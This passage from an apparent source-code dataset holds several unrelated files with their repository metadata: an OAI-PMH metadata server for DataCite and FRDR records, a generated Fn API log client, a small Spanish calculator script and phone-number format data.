
        return data

    def listRecords(
        self,
        metadataPrefix=None,
        from_=None,
        until=None,
        set=None,
        paging_cursor=None
    ):
        #pylint: disable=no-self-use,invalid-name
        """Returns pyoai data tuple for list of records"""
        # If available get the search query from the set param
        search_query = set_to_search_query(set)
        # Get both a provider and client_id from the set
        provider_id, client_id = set_to_provider_client(set)

        results, total_records, paging_cursor = datacite.get_metadata_list(
            query=search_query,
            provider_id=provider_id,
            client_id=client_id,
            from_datetime=from_,
            until_datetime=until,
            cursor=paging_cursor
        )

        records = []
        if results:
            for result in results:
                # Build metadata based on requested format and result
                metadata = self.build_metadata_map(result)

                header = self.build_header(result)
                record = self.build_record(metadata)

                data = (
                    header,
                    record,
                    None  # About string - not used
                )
                records.append(data)

        # This differs from the pyoai implementation in that we have to return a cursor here
        # But this is okay as we have a custom server to handle it.
        return records, total_records, paging_cursor

    def listIdentifiers(
        self,
        metadataPrefix=None,
        from_=None,
        until=None,
        set=None,
        paging_cursor=None
    ):
        #pylint: disable=no-self-use,invalid-name
        """Returns pyoai data tuple for list of identifiers"""
        # Get both a provider and client_id from the set
        provider_id, client_id = set_to_provider_client(set)

        results, total_records, paging_cursor = datacite.get_metadata_list(
            provider_id=provider_id,
            client_id=client_id,
            from_datetime=from_,
            until_datetime=until,
            cursor=paging_cursor
        )

        records = []
        if results:
            for result in results:
                header = self.build_header(result)
                records.append(header)

        # This differs from the pyoai implementation in that we have to return a cursor here
        # But this is okay as we have a custom server to handle it.
        return records, total_records, paging_cursor

    def listSets(
        self,
        paging_cursor=0
    ):
        #pylint: disable=no-self-use,invalid-name
        """Returns pyoai data tuple for list of sets"""
        # Note this implementation is not super efficient as we request
        # the full set every time regardless of actual paging.
        # The paging is handled just by offsetting the records returned.
        # This is however acceptable given sets are a small subset of data.

        # We know we're always dealing with an integer value here
        paging_cursor = int(paging_cursor)

        batch_size = 50
        next_batch = paging_cursor + batch_size

        results, total_results = datacite.get_sets()
        results = results[paging_cursor: next_batch]

        if len(results) < batch_size:
            paging_cursor = None
        else:
            paging_cursor = next_batch

        records = []
        if results:
            for identifier, name in results:
                # Format of a set is setSpec, setName, setDescription
                records.append((identifier.upper(), name, None))

        # This differs from the pyoai implementation in that we have to return a cursor here
        # But this is okay as we have a custom server to handle it.
        return records, total_results, paging_cursor

    def build_header(self, result):
        """Construct an OAI-PMH record header"""
        # Provider symbol can just be extracted from the client symbol
        provider_symbol, _ = result.client.split(".")

        return common.Header(
            None,
            'doi:' + result.identifier,
            result.updated_datetime,
            setspec=[result.provider, result.client],
            deleted=not result.active
        )

    def build_record(self, metadata):
        """Construct an OAI-PMH payload for a record"""
        return common.Metadata(
            None,
            metadata
        )

    def build_metadata_map(self, result):
        """Construct a metadata map object for oai metadata writing"""
        dates = []
        if result.publication_year:
            dates.append(str(result.publication_year))
        dates.extend([date['type'] + ": " + str(date['date'])
                      for date in result.dates])

        rights = []
        for right in result.rights:
            if right['statement']:
                rights.append(right['statement'])
            if right['uri']:
                rights.append(right['uri'])

        identifiers = [
            identifier_to_string(identifier) for identifier in result.identifiers
        ]

        relations = [
            identifier_to_string(relation)
            for relation in result.relations
        ]

        contributors = [
            contributor.get('name') for contributor in result.contributors
        ]

        metadata = {
            'title': result.titles,
            'creator': result.creators,
            'subject': result.subjects,
            'description': result.descriptions,
            'publisher': [result.publisher] if result.publisher else [],
            'contributor': contributors,
            'date': dates,
            'type': result.resource_types,
            'format': result.formats,
            'identifier': identifiers,
            'relation': relations,
            'language': [result.language] if result.language else [],
            'rights': rights,
            'xml': result.xml,
            'set': result.client,
            'metadata_version': result.metadata_version
        }

        return metadata


class FRDROAIServer():
    """Build OAI-PMH responses from the FRDR Postgres server"""

    def identify(self):
        """Construct common identification for the OAI service"""
        identify = common.Identify(
            repositoryName=config.OAIPMH_REPOS_NAME,
            baseURL=config.OAIPMH_BASE_URL,
            protocolVersion="2.0",
            adminEmails=[config.OAIPMH_ADMIN_EMAIL],
            earliestDatestamp=datetime(2011, 1, 1),
            deletedRecord='no',
            granularity='YYYY-MM-DDThh:mm:ssZ',
            compression=['gzip', 'deflate'],
            toolkit_description=False)

        # Specify a custom description
        frdr_desc = """
        <oai-identifier xmlns="http://www.openarchives.org/OAI/2.0/oai-identifier" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai-identifier http://www.openarchives.org/OAI/2.0/oai-identifier.xsd">
            <scheme>oai</scheme>
            <repositoryIdentifier>""" + config.OAIPMH_IDENTIFIER + """</repositoryIdentifier>
            <delimiter>:</delimiter>
            <sampleIdentifier>oai""" + config.OAIPMH_IDENTIFIER + """:1</sampleIdentifier>
        </oai-identifier>
        """
        identify.add_description(xml_string=frdr_desc)

        return identify

    def listMetadataFormats(self, identifier=None):
        #pylint: disable=no-self-use,invalid-name
        """Returns metadata formats available for the repository

        Identifier does nothing as our repository responds in all formats for all dois
        """
        # PyOAI expects result format (metadataPrefix, schema, metadataNamespace)
        format_oai_dc = (
            'oai_dc',
            'http://www.openarchives.org/OAI/2.0/oai_dc.xsd',
            'http://www.openarchives.org/OAI/2.0/oai_dc/'
        )
        format_oai_datacite = (
            'oai_datacite',
            'http://schema.datacite.org/oai/oai-1.1/oai.xsd',
            'http://schema.datacite.org/oai/oai-1.1/'
        )
        format_datacite = (
            'datacite',
            'http://schema.datacite.org/meta/nonexistant/nonexistant.xsd',
            'http://datacite.org/schema/nonexistant'
        )

        return [format_oai_dc, format_oai_datacite, format_datacite]

    def getRecord(self, metadataPrefix, identifier):
        #pylint: disable=no-self-use,invalid-name
        """Returns pyoai data tuple for specific record"""
        # Should we implement this based on source_url and local_identifier the way we currently do for the harvester?
        result = frdr.get_metadata(
            identifier,
            db=config.POSTGRES_DB,
            user=config.POSTGRES_USER,
            password=config.POSTGRES_PASSWORD,
            server=config.POSTGRES_SERVER,
            port=config.POSTGRES_PORT
        )
        if not result:
            raise error.IdDoesNotExistError(
                "\"%s\" is unknown or illegal in this repository" % identifier
            )

        # Build metadata based on requested format and result
        metadata = self.build_metadata_map(result)

        header = self.build_header(result)
        record = self.build_record(metadata)

        data = (
            header,
            record,
            None  # About string - not used
        )

        return data

    def listRecords(
        self,
        metadataPrefix=None,
        from_=None,
        until=None,
        set=None,
        paging_cursor=None
    ):
        #pylint: disable=no-self-use,invalid-name
        """Returns pyoai data tuple for list of records"""
        # If available get the search query from the set param
        search_query = set_to_search_query(set)

        results, total_records, paging_cursor = frdr.get_metadata_list(
            server=config.POSTGRES_SERVER,
            db=config.POSTGRES_DB,
            user=config.POSTGRES_USER,
            password=config.POSTGRES_PASSWORD,
            port=config.POSTGRES_PORT,
            query=search_query,
            set=set,
            from_datetime=from_,
            until_datetime=until,
            cursor=paging_cursor
        )
        if paging_cursor >= total_records:
            paging_cursor = None

        records = []
        if results:
            for result in results:
                # Build metadata based on requested format and result
                metadata = self.build_metadata_map(result)

                header = self.build_header(result)
                record = self.build_record(metadata)

                data = (
                    header,
                    record,
                    None  # About string - not used
                )
                records.append(data)

        # This differs from the pyoai implementation in that we have to return a cursor here
        # But this is okay as we have a custom server to handle it.
        return records, total_records, paging_cursor

    def listIdentifiers(
        self,
        metadataPrefix=None,
        from_=None,
        until=None,
        set=None,
        paging_cursor=None
    ):
        #pylint: disable=no-self-use,invalid-name
        """Returns pyoai data tuple for list of identifiers"""
        # If available get the search query from the set param
        search_query = set_to_search_query(set)

        results, total_records, paging_cursor = frdr.get_metadata_list(
            server=config.POSTGRES_SERVER,
            db=config.POSTGRES_DB,
            user=config.POSTGRES_USER,
            password=config.POSTGRES_PASSWORD,
            port=config.POSTGRES_PORT,
            query=search_query,
            set=set,
            from_datetime=from_,
            until_datetime=until,
            cursor=paging_cursor
        )
        if paging_cursor >= total_records:
            paging_cursor = None

        records = []
        if results:
            for result in results:
                header = self.build_header(result)
                records.append(header)

        # This differs from the pyoai implementation in that we have to return a cursor here
        # But this is okay as we have a custom server to handle it.
        return records, total_records, paging_cursor

    def listSets(
        self,
        paging_cursor=0
    ):
        #pylint: disable=no-self-use,invalid-name
        """Returns pyoai data tuple for list of sets"""
        # Note this implementation is not super efficient as we request
        # the full set every time regardless of actual paging.
        # The paging is handled just by offsetting the records returned.
        # This is however acceptable given sets are a small subset of data.

        # We know we're always dealing with an integer value here
        paging_cursor = int(paging_cursor)

        batch_size = 50
        next_batch = paging_cursor + batch_size

        results, total_results = frdr.get_sets(
            db=config.POSTGRES_DB,
            user=config.POSTGRES_USER,
            password=config.POSTGRES_PASSWORD,
            server=config.POSTGRES_SERVER,
            port=config.POSTGRES_PORT
        )
        results = results[paging_cursor: next_batch]

        if len(results) < batch_size:
            paging_cursor = None
        else:
            paging_cursor = next_batch

        records = []
        if results:
            for identifier, name in results:
                # Format of a set is setSpec, setName, setDescription
                records.append((identifier, name, None))

        # This differs from the pyoai implementation in that we have to return a cursor here
        # But this is okay as we have a custom server to handle it.
        return records, total_results, paging_cursor

    def build_header(self, result):
        """Construct an OAI-PMH record header"""
        return common.Header(
            None,
            str(result.identifier),
            result.updated_datetime,
            setspec=[result.client],
            deleted=not result.active
        )

    def build_record(self, metadata):
        """Construct an OAI-PMH payload for a record"""
        return common.Metadata(
            None,
            metadata
        )

    def build_metadata_map(self, result):
        """Construct a metadata map object for oai metadata writing"""
        identifiers = result.identifiers

        relations = [
            identifier_to_string(relation)
            for relation in result.relations
        ]

        metadata = {
            'title': result.titles,
            'creator': result.creators,
            'subject': result.subjects,
            'description': result.descriptions,
            'publisher': [result.publisher] if result.publisher else [],
            'contributor': result.contributors,
            'date': result.dates,
            'type': result.resource_types,
            'format': result.formats,
            'identifier': identifiers,
            'relation': relations,
            'language': [result.language] if result.language else [],
            'rights': result.rights,
            'xml': result.xml,
            'set': result.client,
            'metadata_version': result.metadata_version
        }

        return metadata


def set_to_search_query(unparsed_set):
    """Take an OAI set and extract any base64url encoded search query"""
    if unparsed_set and "~" in unparsed_set:
        _, search_query_base64 = unparsed_set.split("~")
        try:
            return base64.urlsafe_b64decode(search_query_base64).decode("utf-8")
        except binascii.Error:
            logging.debug("Unable to parse set search query")
            return ""

    return ""


def set_to_provider_client(unparsed_set):
    """Take an OAI set and convert into provider_id and client_id"""
    # Get both a provider and client_id from the set
    client_id = None
    provider_id = None

    if unparsed_set:
        # Strip any additional query
        if "~" in unparsed_set:
            unparsed_set, _ = unparsed_set.split("~")

        if unparsed_set:
            # DataCite API deals in lowercase
            unparsed_set = unparsed_set.lower()
            if "." in unparsed_set:
                provider_id, _ = unparsed_set.split(".")
                client_id = unparsed_set
            else:
                provider_id = unparsed_set

    return provider_id, client_id


def identifier_to_string(identifier):
    """Take an identifier and return it formatted as a single string"""
    _id = identifier.get('identifier')
    _type = identifier.get('type') or ''

    return _type.lower() + ":" + _id
| 33.886824 | 264 | 0.603011 | 2,223 | 20,061 | 5.311291 | 0.135403 | 0.036588 | 0.016092 | 0.018633 | 0.824765 | 0.81511 | 0.81511 | 0.802914 | 0.79275 | 0.79275 | 0 | 0.005794 | 0.311749 | 20,061 | 591 | 265 | 33.944162 | 0.849352 | 0.223867 | 0 | 0.73913 | 0 | 0.005115 | 0.13668 | 0.016865 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053708 | false | 0.01023 | 0.02046 | 0 | 0.138107 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
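The two parsing helpers at the bottom of catalogs.py imply a set convention: an optional provider/client prefix, a "~" separator, then a base64url-encoded search query. A small round-trip sketch follows; the encode_set helper is hypothetical, written here only to illustrate the inverse of set_to_search_query.

# Round-trip sketch of the set convention parsed above.
import base64

def encode_set(prefix, search_query):
    # Hypothetical inverse of set_to_search_query, for illustration only.
    encoded = base64.urlsafe_b64encode(search_query.encode("utf-8")).decode("ascii")
    return prefix + "~" + encoded

oai_set = encode_set("CDL.CDL", "climate data")
# set_to_provider_client(oai_set) -> ("cdl", "cdl.cdl")
# set_to_search_query(oai_set)    -> "climate data"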
78a0e4766bdb2f5f77e44ca4384168c5297fd923 | 196 | py | Python | onadata/apps/api/models/__init__.py | sounay/flaming-octo-tribble | 21f21f0e7b2d7f745173f7957375a9d96c2a065e | [
"BSD-2-Clause"
] | 2 | 2017-11-30T17:43:48.000Z | 2018-10-26T23:44:32.000Z | onadata/apps/api/models/__init__.py | sounay/flaming-octo-tribble | 21f21f0e7b2d7f745173f7957375a9d96c2a065e | [
"BSD-2-Clause"
] | 14 | 2018-07-10T12:48:46.000Z | 2022-03-11T23:24:51.000Z | onadata/apps/api/models/__init__.py | sounay/flaming-octo-tribble | 21f21f0e7b2d7f745173f7957375a9d96c2a065e | [
"BSD-2-Clause"
] | 5 | 2018-07-04T07:59:14.000Z | 2020-01-28T07:50:18.000Z | from onadata.apps.api.models.organization_profile import OrganizationProfile # flake8: noqa
from onadata.apps.api.models.team import Team
from onadata.apps.api.models.temp_token import TempToken
| 49 | 92 | 0.846939 | 28 | 196 | 5.857143 | 0.535714 | 0.20122 | 0.27439 | 0.329268 | 0.439024 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005556 | 0.081633 | 196 | 3 | 93 | 65.333333 | 0.905556 | 0.061224 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
78cf0a2981e51fda300a61a2830125ce99f5f8db | 10,440 | py | Python | swagger_client/apis/log_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | 6 | 2017-09-24T16:50:49.000Z | 2019-10-23T22:14:39.000Z | swagger_client/apis/log_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | null | null | null | swagger_client/apis/log_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
    fn

    The open source serverless platform.

    OpenAPI spec version: 0.2.1
    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""

from __future__ import absolute_import

import sys
import os
import re

# python 2 and python 3 compatibility library
from six import iteritems

from ..configuration import Configuration
from ..api_client import ApiClient


class LogApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def apps_app_calls_call_log_delete(self, call, app, **kwargs):
        """
        Delete call log entry
        Delete call log entry
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_log_delete(call, app, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str call: Call ID. (required)
        :param str app: App name. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.apps_app_calls_call_log_delete_with_http_info(call, app, **kwargs)
        else:
            (data) = self.apps_app_calls_call_log_delete_with_http_info(call, app, **kwargs)
            return data

    def apps_app_calls_call_log_delete_with_http_info(self, call, app, **kwargs):
        """
        Delete call log entry
        Delete call log entry
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_log_delete_with_http_info(call, app, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str call: Call ID. (required)
        :param str app: App name. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['call', 'app']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method apps_app_calls_call_log_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'call' is set
        if ('call' not in params) or (params['call'] is None):
            raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_log_delete`")
        # verify the required parameter 'app' is set
        if ('app' not in params) or (params['app'] is None):
            raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_log_delete`")

        collection_formats = {}

        path_params = {}
        if 'call' in params:
            path_params['call'] = params['call']
        if 'app' in params:
            path_params['app'] = params['app']

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api('/apps/{app}/calls/{call}/log', 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def apps_app_calls_call_log_get(self, app, call, **kwargs):
        """
        Get call logs
        Get call logs
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_log_get(app, call, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str app: App Name (required)
        :param str call: Call ID. (required)
        :return: LogWrapper
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.apps_app_calls_call_log_get_with_http_info(app, call, **kwargs)
        else:
            (data) = self.apps_app_calls_call_log_get_with_http_info(app, call, **kwargs)
            return data

    def apps_app_calls_call_log_get_with_http_info(self, app, call, **kwargs):
        """
        Get call logs
        Get call logs
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_log_get_with_http_info(app, call, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str app: App Name (required)
        :param str call: Call ID. (required)
        :return: LogWrapper
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['app', 'call']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method apps_app_calls_call_log_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'app' is set
        if ('app' not in params) or (params['app'] is None):
            raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_log_get`")
        # verify the required parameter 'call' is set
        if ('call' not in params) or (params['call'] is None):
            raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_log_get`")

        collection_formats = {}

        path_params = {}
        if 'app' in params:
            path_params['app'] = params['app']
        if 'call' in params:
            path_params['call'] = params['call']

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api('/apps/{app}/calls/{call}/log', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='LogWrapper',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
| 38.955224 | 115 | 0.570402 | 1,129 | 10,440 | 5.028344 | 0.139061 | 0.029593 | 0.042276 | 0.056368 | 0.913158 | 0.895191 | 0.893606 | 0.869297 | 0.866126 | 0.820504 | 0 | 0.000879 | 0.346073 | 10,440 | 267 | 116 | 39.101124 | 0.830672 | 0.307471 | 0 | 0.710938 | 1 | 0 | 0.162523 | 0.05564 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039063 | false | 0 | 0.054688 | 0 | 0.148438 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
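For context, a minimal usage sketch of the generated client above. The host URL, app name, and call ID are placeholders, and the snippet assumes the shared-singleton Configuration behaviour of swagger-codegen clients of this vintage.

from swagger_client.configuration import Configuration
from swagger_client.apis.log_api import LogApi

Configuration().host = "http://localhost:8080/v1"  # assumed Fn endpoint, placeholder
api = LogApi()

# Synchronous: blocks and returns a LogWrapper (raises on HTTP errors).
log = api.apps_app_calls_call_log_get("myapp", "some-call-id")

# Asynchronous: returns a thread immediately; the result is passed to the callback.
def on_log(response):
    print(response)

thread = api.apps_app_calls_call_log_get("myapp", "some-call-id", callback=on_log)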
158a24054f88770dd496ad193cde6c3ae31c4208 | 37 | py | Python | catkin_ws/src/adafruit_drivers/include/Gyro_L3GD20/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 12 | 2016-04-14T12:21:46.000Z | 2021-06-18T07:51:40.000Z | catkin_ws/src/adafruit_drivers/include/Gyro_L3GD20/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 14 | 2017-03-03T23:33:05.000Z | 2018-04-03T18:07:53.000Z | catkin_ws/src/adafruit_drivers/include/Gyro_L3GD20/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 113 | 2016-05-03T06:11:42.000Z | 2019-06-01T14:37:38.000Z | from .Gyro_L3GD20 import Gyro_L3GD20
| 18.5 | 36 | 0.864865 | 6 | 37 | 5 | 0.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.108108 | 37 | 1 | 37 | 37 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
159dd60cef71d997c989b91d6ac4c02e31951520 | 2,675 | py | Python | Calculadora.py | alvarado0211-sys/Primeros-Proyectos | f45ba9875e83eb1790fb6fc6b393168cace7649b | [
"MIT"
] | 1 | 2021-03-05T14:32:05.000Z | 2021-03-05T14:32:05.000Z | Calculadora.py | alvarado0211-sys/Primeros-Proyectos | f45ba9875e83eb1790fb6fc6b393168cace7649b | [
"MIT"
] | null | null | null | Calculadora.py | alvarado0211-sys/Primeros-Proyectos | f45ba9875e83eb1790fb6fc6b393168cace7649b | [
"MIT"
] | null | null | null | import time

## Present the calculator and its options
print("Bienvenido a su calculadora personal")
print("1 - SUMA\n2 - RESTA\n3 - MULTIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
print()
operacion = str(input("Ingrese el numero de la operacion deseada: "))
print()

while operacion <= "5" and operacion >= "1":  ## open the loop so the calculator restarts after each operation
    if operacion == "1":  ## this option adds any two numbers
        num1 = float(input("Ingrese un numero: "))
        num2 = float(input("Ingrese un segundo numero: "))
        time.sleep(0.2)
        print()
        print("El resultado de la suma es=", num1 + num2)
        print()
        print("1 - SUMA\n2 - RESTA\n3 - MULTIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
        print()
        operacion = str(input("Ingrese el numero de la operacion deseada: "))
    elif operacion == "2":  ## this option handles subtraction
        num1 = float(input("Ingrese un numero: "))
        num2 = float(input("Ingrese un segundo numero: "))
        time.sleep(0.2)
        print()
        print("El resultado de la resta es=", num1 - num2)
        print()
        print("1 - SUMA\n2 - RESTA\n3 - MULTIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
        print()
        operacion = str(input("Ingrese el numero de la operacion deseada: "))
    elif operacion == "3":  ## this option handles multiplication
        num1 = float(input("Ingrese un numero: "))
        num2 = float(input("Ingrese un segundo numero: "))
        time.sleep(0.2)
        print()
        print("El resultado de la multiplicación es=", num1 * num2)
        print()
        print("1 - SUMA\n2 - RESTA\n3 - MULTIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
        print()
        operacion = str(input("Ingrese el numero de la operacion deseada: "))
    elif operacion == "4":  ## this option handles division
        num1 = float(input("Ingrese un numero: "))
        num2 = float(input("Ingrese un segundo numero: "))
        time.sleep(0.2)
        print()
        print("El resultado de la division es=", num1 / num2)
        print()
        print("1 - SUMA\n2 - RESTA\n3 - MULTIPLICACION\n4 - DIVISION\n5 - SALIR DEL PROGRAMA")
        print()
        operacion = str(input("Ingrese el numero de la operacion deseada: "))
    elif operacion == "5":  ## this option ends and closes the program
        print("El programa ha finalizado")
        time.sleep(0.5)
        break  ## end of the while loop
| 48.636364 | 137 | 0.584673 | 329 | 2,675 | 4.753799 | 0.227964 | 0.099744 | 0.086957 | 0.097187 | 0.745524 | 0.734015 | 0.707161 | 0.707161 | 0.707161 | 0.707161 | 0 | 0.031066 | 0.302056 | 2,675 | 54 | 138 | 49.537037 | 0.806642 | 0.127103 | 0 | 0.705882 | 0 | 0.098039 | 0.430654 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.019608 | 0 | 0.019608 | 0.490196 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
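The five near-identical branches above could be collapsed with a dispatch table mapping each menu choice to an operation. A sketch (illustrative only; the names OPERATIONS and run_once are not from the original):

import operator

OPERATIONS = {
    "1": ("suma", operator.add),
    "2": ("resta", operator.sub),
    "3": ("multiplicacion", operator.mul),
    "4": ("division", operator.truediv),
}

def run_once(choice, a, b):
    # Look up the operation name and function for the chosen menu entry.
    name, fn = OPERATIONS[choice]
    return "El resultado de la %s es= %s" % (name, fn(a, b))

print(run_once("1", 2.0, 3.0))  # El resultado de la suma es= 5.0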
15bba02da25daa8220c7f8346d41e1756eed3894 | 521 | py | Python | python/phonenumbers/data/alt_format_358.py | rodgar-nvkz/python-phonenumbers | 4c7c4892211dbc9bc328bc3356b03853eaf993dc | [
"Apache-2.0"
] | 2,424 | 2015-01-05T05:34:45.000Z | 2022-03-28T22:37:53.000Z | python/phonenumbers/data/alt_format_358.py | rodgar-nvkz/python-phonenumbers | 4c7c4892211dbc9bc328bc3356b03853eaf993dc | [
"Apache-2.0"
] | 166 | 2015-01-30T23:59:18.000Z | 2022-03-14T21:08:42.000Z | Lib/site-packages/phonenumbers/data/alt_format_358.py | PsychedVic/Portafolio | 4bd59d19de41fbea5317d4f2b9e6219ea0359945 | [
"bzip2-1.0.6"
] | 345 | 2015-01-02T00:33:27.000Z | 2022-03-26T13:06:57.000Z | """Auto-generated file, do not edit by hand. 358 metadata"""
from ..phonemetadata import NumberFormat
PHONE_ALT_FORMAT_358 = [NumberFormat(pattern='(\\d)(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['[2568][1-8]|3(?:0[1-9]|[1-9])|9']), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['[12]0[1-9]|4|1[3-9]|29|50|7[15]']), NumberFormat(pattern='(\\d)(\\d{4})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[2568][1-8]|3(?:0[1-9]|[1-9])|9'])]
